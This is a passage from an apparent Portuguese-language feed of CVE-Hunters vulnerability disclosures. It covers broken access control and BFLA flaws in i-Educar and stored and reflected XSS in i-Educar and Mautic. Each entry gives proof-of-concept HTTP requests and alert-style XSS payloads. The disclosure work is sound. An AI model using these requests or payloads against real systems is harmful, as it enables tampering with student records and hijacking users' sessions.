</h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>POST /exportacao-para-o-seb</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-10013-controle-de-acesso-quebrado-no-endpoint-exportacao-para-o-seb">CVE-2025-10013: Controle de Acesso Quebrado no Endpoint <code>/exportacao-para-o-seb</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10013</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/exportacao-para-o-seb</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>POST /exportacao-para-o-seb</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-10013/image.png" width="1843" height="533" srcset="/p/cve-2025-10013/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10013/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10013/image-1.png" width="936" height="436" srcset="/p/cve-2025-10013/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10013/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte solicitação:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">POST /exportacao-para-o-seb HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 47 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/exportacao-para-o-seb </span></span><span class="line"><span class="cl">Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ano=2025<span class="err">&</span>ref_cod_instituicao=1<span class="err">&</span>ref_cod_escola=4 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Observamos que um arquivo está anexado à resposta. Este usuário não deve realizar esta solicitação.</li></ul></p> <p><img src="/p/cve-2025-10013/image-2.png" width="1434" height="538" srcset="/p/cve-2025-10013/image-2_hu_d9f0374d4aca283a.png 480w, /p/cve-2025-10013/image-2_hu_6d9f4bc0f197d6ba.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="266" data-flex-basis="639px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 05 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9823/ https://www.cvehunters.com/pt/p/cve-2025-9823/ <h2 id="cve-2025-9823-cross-site-scripting-xss-refletido-no-endpoint-sajaxactionleadaddleadtags-parâmetro-tags">CVE-2025-9823: Cross-Site Scripting (XSS) Refletido no endpoint <code>/s/ajax?action=lead:addLeadTags</code> parâmetro <code>Tags</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9823</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>/s/ajax?action=lead:addLeadTags</code> do aplicativo Mautic. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Tags</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/s/ajax?action=lead:addLeadTags</code></p> <p>Parâmetro: <code>Tags</code></p> <p style="text-align: justify;">O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.</p><h2 id="cve-2025-9823-cross-site-scripting-xss-refletido-no-endpoint-sajaxactionleadaddleadtags-parâmetro-tags">CVE-2025-9823: Cross-Site Scripting (XSS) Refletido no endpoint <code>/s/ajax?action=lead:addLeadTags</code> parâmetro <code>Tags</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9823</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>/s/ajax?action=lead:addLeadTags</code> do aplicativo Mautic. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Tags</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/s/ajax?action=lead:addLeadTags</code></p> <p>Parâmetro: <code>Tags</code></p> <p style="text-align: justify;">O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm" target="_blank" rel="noopener" >https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 03 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9760/ https://www.cvehunters.com/pt/p/cve-2025-9760/ <h2 id="cve-2025-9760-broken-function-level-authorization-bfla-na-api-matricula-permite-a-exclusão-do-status-abandono">CVE-2025-9760: Broken Function Level Authorization (BFLA) na API <code>matricula</code> permite a exclusão do status “abandono” </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9760" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9760</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade <b>Broken Function Level Authorization (BFLA)</b> foi identificada na API <code>matricula</code> do aplicativo i-Educar. Esse problema permite que usuários com poucos privilégios excluam o status "abandono" (abandono) de matrículas arbitrárias de alunos manipulando parâmetros de solicitação.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b></br><code>GET /module/Api/aluno</code></br></br>O aplicativo não aplica verificações de autorização para garantir que apenas usuários com privilégios (por exemplo, administradores) possam realizar operações confidenciais, como excluir um status de abandono. Ao alterar o parâmetro <code>id</code>, um invasor pode afetar registros que não lhe pertencem.</p><h2 id="cve-2025-9760-broken-function-level-authorization-bfla-na-api-matricula-permite-a-exclusão-do-status-abandono">CVE-2025-9760: Broken Function Level Authorization (BFLA) na API <code>matricula</code> permite a exclusão do status “abandono” </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9760" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9760</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade <b>Broken Function Level Authorization (BFLA)</b> foi identificada na API <code>matricula</code> do aplicativo i-Educar. Esse problema permite que usuários com poucos privilégios excluam o status "abandono" (abandono) de matrículas arbitrárias de alunos manipulando parâmetros de solicitação.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b></br><code>GET /module/Api/aluno</code></br></br>O aplicativo não aplica verificações de autorização para garantir que apenas usuários com privilégios (por exemplo, administradores) possam realizar operações confidenciais, como excluir um status de abandono. Ao alterar o parâmetro <code>id</code>, um invasor pode afetar registros que não lhe pertencem.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-9760/image.png" width="1380" height="528" srcset="/p/cve-2025-9760/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-9760/image_hu_374181a535d27950.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="627px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /module/Api/matricula?<span class="err">&</span>oper=delete<span class="err">&</span>resource=abandono<span class="err">&</span>id=206 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Observamos que a exclusão foi bem-sucedida.</li></ul></p> <p><img src="/p/cve-2025-9760/image-1.png" width="1574" height="542" srcset="/p/cve-2025-9760/image-1_hu_6621613282a2babf.png 480w, /p/cve-2025-9760/image-1_hu_7a7d76a95a6fa6ef.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="290" data-flex-basis="696px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta é uma vulnerabilidade Broken Function Level Authorization (BFLA), conforme categorizado pelo OWASP API Security Top 10 (2023) - API4. As consequências incluem: <ul> <li>Adulteração de dados acadêmicos sem autorização.</li> <li>Perda da integridade de dados em registros escolares.</li> <li>Potenciais danos legais e à reputação de instituições de ensino.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9720/ https://www.cvehunters.com/pt/p/cve-2025-9720/ <h2 id="cve-2025-9720-cross-site-scripting-xss-armazenado-no-endpoint-tabelaarredondamentoedit-parâmetro-nome">CVE-2025-9720: Cross-Site Scripting (XSS) Armazenado no endpoint <code>TabelaArredondamento/edit</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9720" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9720</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>TabelaArredondamento/edit</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>TabelaArredondamento/edit</code></p><h2 id="cve-2025-9720-cross-site-scripting-xss-armazenado-no-endpoint-tabelaarredondamentoedit-parâmetro-nome">CVE-2025-9720: Cross-Site Scripting (XSS) Armazenado no endpoint <code>TabelaArredondamento/edit</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9720" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9720</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>TabelaArredondamento/edit</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>TabelaArredondamento/edit</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9720/image.png" width="646" height="278" srcset="/p/cve-2025-9720/image_hu_9177624e6cc80aee.png 480w, /p/cve-2025-9720/image_hu_228acf1500b7defe.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="232" data-flex-basis="557px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9720.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9721/ https://www.cvehunters.com/pt/p/cve-2025-9721/ <h2 id="cve-2025-9721-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-formulamediaedit">CVE-2025-9721: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>FormulaMedia/edit</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9721" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9721</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>FormulaMedia/edit</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code> e <code>formulaMedia</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/module/FormulaMedia/edit</code></p><h2 id="cve-2025-9721-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-formulamediaedit">CVE-2025-9721: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>FormulaMedia/edit</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9721" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9721</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>FormulaMedia/edit</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code> e <code>formulaMedia</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/module/FormulaMedia/edit</code></p> <p>Parâmetros:<code>nome</code> e <code>formulaMedia</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nome</code> e <code>formulaMedia</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9721/image.png" width="575" height="237" srcset="/p/cve-2025-9721/image_hu_a20ceff440c81918.png 480w, /p/cve-2025-9721/image_hu_dbd5009a60ec4280.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="242" data-flex-basis="582px" /></p> <p><img src="/p/cve-2025-9721/image-1.png" width="567" height="221" srcset="/p/cve-2025-9721/image-1_hu_36237c6d629f87b.png 480w, /p/cve-2025-9721/image-1_hu_10da103514a2b8fa.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="256" data-flex-basis="615px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9722/ https://www.cvehunters.com/pt/p/cve-2025-9722/ <h2 id="cve-2025-9722-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp">CVE-2025-9722: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9722</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_tipo</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_tipo_ocorrencia_disciplinar_cad.php</code></p><h2 id="cve-2025-9722-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp">CVE-2025-9722: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9722</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_tipo_ocorrencia_disciplinar_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_tipo</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_tipo_ocorrencia_disciplinar_cad.php</code></p> <p>Parâmetros:<code>nm_tipo</code> e <code>descricao</code></p> <p style="text-align: justify;">O aplicativo não consegue 